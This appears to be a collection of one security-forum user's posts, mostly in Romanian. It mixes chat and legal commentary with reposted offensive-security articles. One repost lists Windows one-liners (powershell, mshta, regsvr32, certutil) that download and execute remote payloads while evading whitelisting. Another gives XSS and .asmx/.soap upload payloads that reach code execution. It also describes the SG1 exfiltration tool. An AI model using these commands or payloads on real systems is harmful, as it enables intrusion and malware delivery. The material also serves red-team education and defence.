Nytro

Da, vazusem la un moment dat, o sa il scot. L-am pus in Apache si probabil in genereaza si IPBoard.

Am facut update la server. Aveti acum si HTTP 2.0. Sa imi ziceti daca sunt probleme.

A reinceput sa creasca Bitcoin.

O descriere oficiala puteti gasi aici: https://www.bestjobs.eu/ro/loc-de-munca/working-student-application-security-internship Daca aveti intrebari, astept un mesaj privat.

Salut, 1&1 cauta persoane interesate de securitatea aplicatiilor web. Se cauta si pentru penetration testing si pentru dezvoltarea unor aplicatii legate de acest lucru. Daca e cineva interesat, astept un mesaj privat si va pot oferi mai multe detalii.

O sa ma uit sa vad daca gasesc plugin-ul.

Stack Based Buffer Overflows on x86 (Windows) – Part I I wrote this article in Romanian, in 2014, and I decided to translate it, because it is a very detailed introduction in the exploitation of a “Stack Based Buffer Overflow” on x86 (32 bits) Windows. Introduction This tutorial is for beginners, but it requires at least some basic knowledge about C/C++ programming in order to understand the concepts. The system that we will use and exploit the vulnerability on is Windows XP (32 bits – x86) for simplicity reasons: there is not DEP and ASLR, things that will be detailed later. I would like to start with a short introduction on assembly (ASM) language. It will not be very detailed, but I will shortly describe the concepts required to understand how a “buffer overflow” vulnerability looks like, and how it can be exploited. There are multiple types of buffer overflows, here we will discuss only the easiest to understand one, stack based buffer overflow. Sursa: https://nytrosecurity.com/2017/12/09/stack-based-buffer-overflows-on-x86-windows-part-i/

Salut, Ma uitam azi peste modificarile facute de catre "prietenii" de la PSD-ALDE si observ ceva interesant. Este vorba de "Art. 223 Condițiile și cazurile de aplicare a măsurii arestării preventive", alineatul 2. Textul initial: "Măsura arestării preventive a inculpatului poate fi luată şi dacă din probe rezultă suspiciunea rezonabilă că acesta a săvârșit o infracțiune intenționată contra vieții, o infracțiune prin care s-a cauzat vătămarea corporală sau moartea unei persoane, o infracțiune contra securității naționale prevăzută de Codul penal și alte legi speciale, o infracțiune de trafic de droguri, de efectuare de operațiuni ilegale cu precursori sau cu alte produse susceptibile de a avea efecte psihoactive, o infracțiune privind nerespectarea regimului armelor, munițiilor, materialelor nucleare și al materiilor explozive, trafic și exploatarea persoanelor vulnerabile, acte de terorism, spălare a banilor, falsificare de monede, timbre sau de alte valori, șantaj, viol, lipsire de libertate în mod ilegal, evaziune fiscală, ultraj, ultraj judiciar, o infracțiune de corupție, o infracțiune săvârșită prin sisteme informatice sau mijloace de comunicare electronică sau o altă infracțiune pentru care legea prevede pedeapsa închisorii de 5 ani ori mai mare și, pe baza evaluării gravității faptei, a modului și a circumstanțelor de comitere a acesteia, a anturajului și a mediului din care acesta provine, a antecedentelor penale și a altor împrejurări privitoare la persoana acestuia, se constată că privarea sa de libertate este necesară pentru înlăturarea unei stări de pericol pentru ordinea publică." Textul modificat: "Măsura arestării preventive a inculpatului poate fi luată şi dacă din probe rezultă suspiciunea rezonabilă că acesta a săvârșit o infracțiune intenționată contra vieții, o infracțiune prin care s-a cauzat vătămarea corporală sau moartea unei persoane, o infracțiune contra securității naționale prevăzută de Codul penal și alte legi speciale, o infracțiune de trafic de stupefiante, trafic de arme, trafic de persoane, de terorism şi care vizează acte de terorism, falsificare de monede ori alte valori, șantaj, viol, lipsire de libertate, ultraj, ultraj judiciar sau o altă infracțiune comisă cu violență si, cumulativ, pe baza evaluării gravității faptei, a modului și a circumstanțelor de comitere a acesteia, a anturajului și a mediului din care acesta provine, a antecedentelor penale și a altor împrejurări privitoare la persoana acestuia, se constată că privarea sa de libertate este absolut necesară pentru înlăturarea unei stări de pericol concret pentru ordinea publică." Aveti aici un DIFF: Cum ma asteptam, se vede ca lipsesc urmatoarele lucruri: - spalarea banilor - evaziune fiscala - infractiune de coruptie Dar si "infractiune savarsita prin sisteme informatice sau mijloace de comunicare electronica". Cu alte cuvinta, dupa parerea mea de persoana care nu se pricepe in domeniul legal, pentru acele infractiuni nu se va mai aplica arestarea preventiva. Am postat acest lucru pentru ca in cazul in care sunteti acuzati de "infractiuni savarsite prin sisteme informatice", sa aveti in vedere ca (daca va trece legea si probabil va trece), nu veti putea fi retinuti. Gasiti aici o colectie de modificari marca PSD: http://media.hotnews.ro/media_server1/document-2017-12-14-22176865-0-transpunere-directiva-nevinovatie-13-dec.pdf

Eu imi fac mai multe griji pentru ei: https://www.seagate.com/de/de/enterprise-storage/nytro-drives/

Eu am username-ul de "Nytro" de prin 2007-2008. Trebuie sa vad de cand au ales ei numele firmei sa stiu cine are prioritate. Da, e adevarat ce zici, o sa ma gandesc si la altceva, thanks!

Mi-am facut si eu blog. Nu o sa scriu prea des, doar asa, din cand in cand... https://nytrosecurity.com/

Un tip Slick facuse acel program (Conquistador killer) si era admin aici pe forum. Se poate face acel program si pentru alte jocuri de acel gen. Daca il cumparai, il putea si crackui si nu te mai interesa de licenta lui, nu?

Investiti in oua. Multumiti-mi mai tarziu.

48$ pe an? Cu banii astia imi iau Yahoo! Premium/Pro, tot atat este. </joke>

La eMAG sunt ceva reduceri cu voucher "eMAG16ani". Reducerile (la multe produse) sunt mici, dar pe bune. Orice produs, reducere 5%. Ma uitasem la Huawei Mate 10 Pro, reducerea e reala de 170 RON. La anumite categorii sunt reduceri de 10%-20%-30%. Poate va ajuta.

Nu am idee. Ar putea sa dea un semn daca mai sunt pe aici.

Why <blank> Gets You Root https://objective-see.com/blog/blog_0x24.html

Ai vreun 0day de care nu vrei sa ne spui? Batman poate scrie si exploit-uri de kernel daca vrea...

Change the root password Choose Apple menu () > System Preferences, then click Users & Groups (or Accounts). Click , then enter an administrator name and password. Click Login Options. Click Join (or Edit). Click Open Directory Utility. Click in the Directory Utility window, then enter an administrator name and password. From the menu bar in Directory Utility, choose Edit > Change Root Password… Enter a root password when prompted. Via: https://support.apple.com/en-us/HT204012

Inca una de cacat dupa cea cu parola in loc de hint. Nu mai au buget pentru developeri buni?

Syscall Monitor Introduction This is a process monitoring tool (like Sysinternal's Process Monitor) implemented with Intel VT-X/EPT for Windows 7+. Develop Environment Visual Studio 2015 update 3 Windows SDK 10 Windows Driver Kit 10 QT5.7 for MSVC Deployment QT GUI project: SyscallMonQT/SyscallMonQT.pro Windows kernel driver project: ddimon/DdiMon/DdiMon.vcxproj Remember to modify the shadow build path to /build32 or /build64 when configure the QT project Remember to modify the windeploy.exe path in deploy32/deploy64.bat, run deploy32/64.bat to deploy x86/x64 binary files to bin32/bin64 Remember to sign the x64 kernel driver file Platform x86 and x64 Windows 7, 8.1 and 10 CPU with Intel VT-x and EPT technology support Reference & Thanks BOOST http://www.boost.org/ QT https://www.qt.io/ HyperPlatform https://github.com/tandasat/HyperPlatform Capstone http://www.capstone-engine.org/ TODO 1.Optimize the memory usage issue. Screenshots Sursa: https://github.com/hzqst/Syscall-Monitor

Windows oneliners to download remote payload and execute arbitrary code 20 novembre 2017 arno0x0x In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself « what are the coolest command lines an attacker could use besides the famous powershell oneliner » ? These command lines need to fulfill the following prerequisites: allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits huh ? allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, does it ? be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays ? make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as much systems as possible be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet ? work in memory only – because your final payload might get caught by AV when written on disk A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want: execute arbitrary code abusing Microsoft built-in binaries. Let’s be clear that not all command lines will fulfill all of the above points. Especially the « do not write the payload on disk » one, because most of the time the downloaded file will end-up in a local cache. When it comes to downloading a payload from a remote server, it basically boils down to 3 options: either the command itself accepts an HTTP URL as one of its arguments the command accepts a UNC path (pointing to a WebDAV server) the command can execute a small inline script with a download cradle Depending on the version of Windows (7, 10), the local cache for objects downloaded over HTTP will be the IE local cache, in one the following location: C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\ C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir> On the other hand, files accessed via a UNC path pointing to a WebDAV server will be saved in the WebDAV client local cache: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV When using a UNC path to point to the WebDAV server hosting the payload, keep in mind that it will only work if the WebClient service is started. In case it’s not started, in order to start it even from a low privileged user, simply prepend your command line with « pushd \\webdavserver & popd ». In all of the following scenarios, I’ll mention which process is seen as performing the network traffic and where the payload is written on disk. Powershell Ok, this is by far the most famous one, but also probably the most monitored one, if not blocked. A well known proxy friendly command line is the following: 1 powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex" Process performing network call: powershell.exe Payload written on disk: NO (at least nowhere I could find using procmon !) Of course you could also use its encoded counterpart. But you can also call the payload directly from a WebDAV server: 1 powershell -exec bypass -f \\webdavserver\folder\payload.ps1 Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Cmd Why make things complicated when you can have cmd.exe executing a batch file ? Especially when that batch file can not only execute a series of commands but also, more importantly, embed any file type (scripting, executable, anything that you can think of !). Have a look at my Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior work), and see that you can easily drop any binary, dll, script: https://github.com/Arno0x/PowerShellScripts So once you’ve been creative with your payload as a batch file, go for it: 1 cmd.exe /k < \\webdavserver\folder\batchfile.txt Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Cscript/Wscript Also very common, but the idea here is to download the payload from a remote server in one command line: 1 cscript //E:jscript \\webdavserver\folder\payload.txt Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Mshta Mshta really is the same family as cscript/wscript but with the added capability of executing an inline script which will download and execute a scriptlet as a payload: 1 mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) Process performing network call: mshta.exe Payload written on disk: IE local cache You could also do a much simpler trick since mshta accepts a URL as an argument to execute an HTA file: 1 mshta http://webserver/payload.hta Process performing network call: mshta.exe Payload written on disk: IE local cache Eventually, the following also works, with the advantage of hiding mshta.exe downloading stuff: 1 mshta \\webdavserver\folder\payload.hta Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Rundll32 A well known one as well, can be used in different ways. First one is referring to a standard DLL using a UNC path: 1 rundll32 \\webdavserver\folder\payload.dll,entrypoint Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Rundll32 can also be used to call some inline jscript: 1 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); Process performing network call: rundll32.exe Payload written on disk: IE local cache Regasm/Regsvc Regasm and Regsvc are one of those fancy application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (can be written in .Net/C#) that will expose the proper interfaces, and you can then call it over WebDAV: 1 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Regsvr32 Another one from @subTee. This ones requires a slightly different scriptlet from the mshta one above. First option: 1 regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll Process performing network call: regsvr32.exe Payload written on disk: IE local cache Second option using UNC/WebDAV: 1 regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Odbcconf This one is close to the regsvr32 one. Also discovered by @subTee, it can execute a DLL exposing a specific function. To be noted is that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV: 1 odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Msbuild Let’s keep going with all these .Net framework utilities discovered by @subTee. You can NOT use msbuild.exe using an inline tasks straight from a UNC path (actually, you can but it gets really messy), so I turned out with the following trick, using msbuild.exe only. Note that it will require to be called within a shell with ENABLEDELAYEDEXPANSION (/V option): 1 cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" Process performing network call: svchost.exe Payload written on disk: WebDAV client local cache Not sure this one is really useful as is. As we’ll see later, we could use other means of downloading the file locally, and then execute it with msbuild.exe. Combining some commands After all, having the possibility to execute a command line (from DDE for instance) doesn’t mean you should restrict yourself to only one command. Commands can be chained to reach an objective. For instance, the whole payload download part can be done with certutil.exe, again thanks to @subTee for discovering this: 1 certutil -urlcache -split -f http://webserver/payload payload Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload: 1 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll You could simply deliver an executable: 1 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe There are probably much other ways of achieving the same result, but these command lines do the job while fulfilling most of prerequisites we set at the beginning of this post ! One may wonder why I do not mention the usage of the bitsadmin utility as a means of downloading a payload. I’ve left this one aside on purpose simply because it’s not proxy aware. Payloads source examples All the command lines previously cited make use of specific payloads: Various scriplets (.sct), for mshta, rundll32 or regsvr32 HTML Application (.hta) MSBuild inline tasks (.xml or .csproj) DLL for InstallUtil or Regasm/Regsvc You can get examples of most payloads from the awesome atomic-red-team repo on Github: https://github.com/redcanaryco/atomic-red-team from @redcanaryco. You can also get all these payloads automatically generated thanks to the GreatSCT project on Github: https://github.com/GreatSCT/GreatSCT You can also find some other examples on my gist: https://gist.github.com/Arno0x Sursa: https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/

SG1 _______ _,.--==###\_/=###=-.._ ..-' _.--\\_//---. `-.. ./' ,--'' \_/ `---. `\. ./ \ .,-' _,,......__ `-. / \. /`. ./\' _,.--'':_:'"`:'`-..._ /\. .'\ / .'`./ ,-':":._.:":._.:"+._.:`:. \.'`. `. ,' // .-''"`:_:'"`:_:'"`:_:'"`:_:'`. \ \ / ,' /'":._.:":._.:":._.:":._.:":._.`. `. \ / / ,'`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_\ \ \ ,\\ ; /_.:":._.:":._.:":._.:":._.:":._.:":\ ://, / \\ /'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'\ // \. |//_ \ ':._.:":._.+":._.:":._.:":._.:":._.:":._\ / _\\ \ /___../ /_:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"'. \..__ | | | '":._.:":._.:":._.:":._.:":._.:":._.:":._.| | | | | |-:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"`| | | | | |":._.:":._.:":._.:":._.:":._.+":._.:":._.| | | | : |_:'"`:_:'"`:_+'"`:_:'"`:_:'"`:_:'"`:_:'"`| ; | | \ \.:._.:":._.:":._.:":._.:":._.:":._.:":._| / | \ : \:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'"`:_:'.' ; | \ : \._.:":._.:":._.:":._.:":._.:":._.:":,' ; / `. \ \..--:'"`:_:'"`:_:'"`:_:'"`:_:'"`-../ / / `__.`.'' _..+'._.:":._.:":._.:":._.:":.`+._ `-,:__` .-'' _ -' .'| _________________________ |`.`-. `-.._ _____' _..-|| :.' .+/;;';`;`;;:`)+(':;;';',`\;\|. `,'|`-. `_____ MJP .-' .'.' :- ,'/,',','/ /./|\.\ \`,`,-,`.`. : `||-.`-._ .' ||.-' ,','/,' / / / + : + \ \ \ `,\ \ `.`-|| `. `-. .-' |' _','<', ,' / / // | \\ \ \ `, ,`.`. `. `. `-. : - `. `. BECAUSE REASONS SG1 is a wanna be swiss army knife for data encryption, exfiltration and covert communication. In its core sg1 aims to be as simple to use as nc while maintaining high modularity internally, being a framework for bizarre exfiltration, data manipulation and transfer methods. Have you ever thought to have your chats or data transfers tunneled through encrypted, private and self deleting pastebins? What about sending that stuff to some dns client -> dns server bridge? Then TLS maybe? WORK IN PROGRESS, DON'T JUDGE Installation Make sure you have at least go 1.8 in order to build sg1, then: go get github.com/miekg/dns go get github.com/evilsocket/sg1 cd $GOPATH/src/github.com/evilsocket/sg1/ make If you want to build for a different OS and / or architecture, you can instead do: GOOS=windows GOARCH=386 make After compilation, you will find the sg1 binary inside the build folder, you can start with taking a look at the help menu: ./build/sg1 -h Sursa: https://github.com/evilsocket/sg1

Why BlackList < WhiteList 22 Nov 2017 Often, when you write the code, which is responsible for file uploading, you check the extensions of downloaded file with using “whitelist” (when you can upload only files with certain extensions) or “blacklist” (when you can upload any files which are not included in the list). After the @ldionmarcil’s post, I decided to understand how popular web-servers interact with various types of extensions. Firstly, I was interested in which content-type is returned by the web-server on different file types. Developers usually include only well-known and obvious extensions in the blacklist. In the article, I want to consider not the wide-spreading file types. For demonstration PoC, I used the following payloads: Basic XSS payload: <script>alert(1337)</script> XML-based XSS payload: <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script> Below I’ll show the results of this little research. IIS web server By default, IIS responds with the text/html content-type on the file types, which presented in list below: Extensions with basic vector: .cer .hxt .htm Therefore, it is possible to paste the basic XSS vector in the uploaded file, and we will get an alert box in browser after opening the document. The list below includes extensions on which IIS responds with the content-type which allow to execute XSS via XML-based vector. Extensions with XML-based vector: .dtd .mno .vml .xsl .xht .svg .xml .xsd .xsf .svgz .xslt .wsdl .xhtml By default, IIS also supports SSI, however exec section is prohibited for the security reasons Extensions for SSI: .stm .shtm .shtml More detailed information about SSI is written in the post by @ldionmarcil In addition: There are also two other interesting extensions (.asmx and .soap) that could lead to arbitrary code execution. It was discovered in collaboration with Yury Aleinov (@YuryAleinov). Asmx extension If you can upload file with .asmx extension, it can lead to arbitrary code execution. For example, we took file with the following content: <%@ WebService Language="C#" Class="MyClass" %> using System.Web.Services; using System; using System.Diagnostics; [WebService(Namespace="")] public class MyClass : WebService { [WebMethod] public string Pwn_Function() { Process.Start("calc.exe"); return "PWNED"; } } Then we sent POST request to the uploaded document: POST /1.asmx HTTP/1.1 Host: localhost Content-Type: application/soap+xml; charset=utf-8 Content-Length: 287 <?xml version="1.0" encoding="utf-8"?> <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"> <soap12:Body> <Pwn_Function/> </soap12:Body> </soap12:Envelope> As the result, IIS executed “calc.exe” Soap extension Contents of uploaded file with .soap extension: <%@ WebService Language="C#" Class="MyClass" %> using System.Web.Services; using System; public class MyClass : MarshalByRefObject { public MyClass() { System.Diagnostics.Process.Start("calc.exe"); } } SOAP request: POST /1.soap HTTP/1.1 Host: localhost Content-Length: 283 Content-Type: text/xml; charset=utf-8 SOAPAction: "/" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <MyFunction /> </soap:Body> </soap:Envelope> Apache (httpd or Tomcat) Extensions with basic vector: .shtml .html.de or .html.xxx (xxx – any characters)* Extensions with XML-based vector: .rdf .xht .xml .xsl .svg .xhtml .svgz * if there are any characters after “.html.” in the extension, Apache will respond with text/html content-type. In addition: Apache returns response without Content-type header on a large number of files with different extensions, which allows an XSS attack, because browser often decides how to handle this page by itself. This article includes detailed information about this question. For example, files with the .xbl and .xml extension are processed similar in Firefox (if there is no Content-Type header in the response), so there is the possibility of exploiting XSS using XML-based vector in this browser. Nginx Extensions with basic vector: .htm Extensions with XML-based vector: .svg .xml .svgz Sursa: https://mike-n1.github.io/ExtensionsOverview

VEHICLE Viewstate Hidden Event Enumerator! An advanced toolset for testing modern web application frameworks and rich internet applications. VEHICLE (formerly known as ria-scip) is a pentest platform with advanced testing features for modern web application frameworks (MWAF) and rich internet applications (RIA). It enables testers to affect various server control properties and enumerate & execute dormant events of invisible, visible, disabled and commented server web controls (currently supported for ASP.net and Mono). These features are implemeted by abusing application mis-configurations and framework-specific programming flaws, and by manipulating proprietary input formats. The project is implemented as an extension to the OWASP Zed Attack Proxy (ZAP) project. Developed by Hacktics ASC Link: https://github.com/hacktics/vehicle